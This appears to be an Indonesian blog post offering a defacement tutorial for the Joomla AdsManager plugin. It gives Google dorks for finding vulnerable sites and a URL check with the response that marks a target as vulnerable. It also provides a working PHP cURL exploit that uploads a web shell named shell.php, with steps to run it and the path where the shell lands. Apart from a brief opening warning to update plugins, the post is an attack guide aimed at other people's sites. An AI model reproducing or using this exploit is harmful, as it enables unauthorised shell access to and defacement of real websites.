untuk kalian yang memakai CMS joomla dan wordpress harus berhati-hati kalau memasang plugin dan rajin di update jika ada pembaruan.
Kali ini celahnya di plugin joomla adsmanager, sudah lama sih sebenarnya dan udah basi, tapi apa salahnya berbagi lagi.
Oke langsung saja.
Bahan-bahan:
- Xampp: Download
- Dork :
inurl:index.php?option=com_adsmanager
intext:"adsmanager version 2.5"
"com_adsmanager" site:nama domain
- Untuk cek vuln tidaknya
http://target/index.php?option=com_adsmanager&task=upload&tmpl=component
Jika muncul {"jsonrpc" : "2.0", "result" : null, "id" : "id","tmpfile" : "_960"}
Berati target Vuln
- Exploits
<?php
$url = "http://target/index.php?option=com_adsmanager&task=upload&tmpl=component";
$post = array
(
"file" => "@hack.png",
//file asal
"name" => "shell.php"
//shell kamu
);
$ch = curl_init ("$url");
curl_setopt ($ch, CURLOPT_RETURNTRANSFER,
1);
curl_setopt ($ch, CURLOPT_FOLLOWLOCATION,
1);
curl_setopt ($ch, CURLOPT_CONNECTTIMEOUT,
5);
curl_setopt ($ch, CURLOPT_SSL_VERIFYPEER, 0);
curl_setopt ($ch, CURLOPT_SSL_VERIFYHOST, 0);
curl_setopt ($ch, CURLOPT_POST, 1);
@curl_setopt ($ch, CURLOPT_POSTFIELDS, $post);
$data = curl_exec ($ch);
curl_close ($ch);
echo $data;
?>
- Ganti target ke target kalian, dan jangan lupa file hack.png dan shell.php juga di ganti, Lalu Simpan kode di atas di folder C: > Xampp > php dengan format file.php
- Buka xampp, Aktifkan Apache dan Mysql
- Run exploit di atas dengan CMD
- Shell acces
target/tmp/plupload/shell.php
- Selesai
Tag: deface dengan com_adsmanager, tutorial deface dengan com_adsmanager, Bugs plugin joomla adsmanager, tutorial deface, Idiot Attacker
0 Komentar